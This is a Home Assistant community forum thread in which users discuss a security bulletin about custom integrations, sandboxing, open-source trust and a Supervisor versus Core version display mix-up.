Security Bulletin

It’s open source. Anyone can check.

2 Likes

Every open source software reach its peak and security suddenly become big issue. Lock down here and there and in the end remove support for 3rd party addon/support. Really hope HA does not goes this direction.

3 Likes

I hope they find a way to somehow sandbox custom components.

1 Like

Why would you trust that when they specifically say to use them at your own risk? There’s a big clue there. You either go down the Apple model and sandbox/lockdown everything (which is fine if you’re taking a nice percentage of everyone else’s work) or you leave it open and flexible which as a consequence means they don’t need to vet every line of code in every custom component. There has to be a compromise. If you want the highest possible security then choose a platform which isn’t open source and doesn’t allow custom code to run. Even then nothing is guaranteed.

3 Likes

Get some perspective. How many malicious custom integrations from members of this community have there been?

4 Likes

after updating from 2021.1.1 to 2021.1.2 my Supervisor -> System tab displays 2020.12.7 as current installed and latest version.

image

However my system health points to 2021.1.2

System Health

version: 2021.1.2
installation_type: Home Assistant OS
dev: false
hassio: true
docker: true
virtualenv: false
python_version: 3.8.7
os_name: Linux
os_version: 5.4.79-v8
arch: aarch64
timezone: Europe/Paris

Anyone else having the same issue?

That’s Supervisor version vs Core version

2 Likes

You should add the usual “We are still analyzing the extent of the situation and will be providing additional details very soon.”, otherwise it seems that there will be no more info. The blog post seems very “done” at the moment.

2 Likes

Yes and as soon as the current beta for supervisor is pushed to stable, that page will also show the core version and that will be the end of the current confusion.

I guess the risk is only real for ones who exposed their HA on a DMZ and/or via a NabulaCasa subscription.
I don’t see how it can have serious impact with a personnal and local use of HA (even with VPN), Wifi network should have to be break first.

1 Like

the threat is on the inside, what if the custom integration is sending out information

1 Like

Based on what? What if and integration is sending information to an external source?

Thanks for your quick work on addressing this.

1 Like

My mistake, I though it’s was a new discovered security leak from outside because that risk always exists with non official sources.
So to make it more clear, does that announce means that it is now recognized that some specific custom intégrations do are malicious, leaking out personnal data ?

No.

1 Like

Happy that most of my setup is locally controlled Z-Wave, Zigbee and Tasmota devices. The only credentials I could leak are a couple free API keys…

Surprised to see comments here and on Reddit thread that think a VPN would somehow protect them from an already installed component being able to transmit data out of the system :worried:

2 Likes

It would be nice if we could read some more specific information, at least which custom integrations are affected. I use a number of custom integrations, installed via HACS, and some of them I depend on frequently so before I install the update I need to know if they are affected so I can decide myself if I will take the risk.

Thanks in advance,
Rien

2 Likes

There’s no way that the HA team would be able to test every single custom component available via HACS and give a report of if there’s any problem with them after an update. So I would not wait for them to give you such a report.
That’s why they are custom and they are used at your own risk.
If a custom component isnt doing anything suspicious or questionable, it should not be a problem.

The HA team may, in the near future, give answers to why this update was made and if there are any specific custom components that were found to be exploiting this; however I would not hold my breath for them to evaluate thousands of components that are not a part of core. If you want a guarantee that nothing will be effected, use only components included in core.

5 Likes

Unfortunately the lack of very basic technical knowledge no longer surprises me, but it is incredibly worrying.

7 Likes

Agreed,

Maybe it’s an idee that all users who experience issue with their custom integrations after installing the update, mention it in this or a separate thread.

1 Like